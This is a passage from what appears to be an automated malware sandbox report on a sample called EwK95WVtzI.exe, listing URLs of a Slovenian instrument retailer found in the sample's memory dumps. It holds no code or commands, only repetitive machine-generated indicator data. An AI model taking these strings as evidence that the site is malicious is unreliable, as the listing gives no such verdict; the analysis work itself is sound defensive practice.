00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/wika-partner/nivo/prikazovalniki-nivoja/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/wika-partner/sila/
                Source: EwK95WVtzI.exe, 00000000.00000003.1998747633.0000000004980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/wika-partner/temperatura/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/wika-partner/temperatura/dodatni-izdelki-in-dodatki-za-tempe
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/wika-partner/temperatura/pretvorniki-temperature/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/wika-partner/temperatura/prikazovalniki-temperature/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/wika-partner/temperatura/temperaturna-stikala-wika/
                Source: EwK95WVtzI.exe, 00000000.00000003.1998747633.0000000004980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/wika-partner/tlak/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/wika-partner/tlak/dodatni-izdelki-in-dodatki-za-tlak/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/wika-partner/tlak/manometri-wika/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/wika-partner/tlak/pretvorniki-tlaka-wika/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/wika-partner/tlak/tlacna-stikala-wika/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/wika-partner/tok/
                Source: EwK95WVtzI.exe, 00000000.00000003.1998747633.0000000004980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kontakt/
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kurilna-sezona-znova-na-pragu/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/moj-racun/lost-password/
                Source: EwK95WVtzI.exe, 00000000.00000003.1998747633.0000000004980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/o-podjetju/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 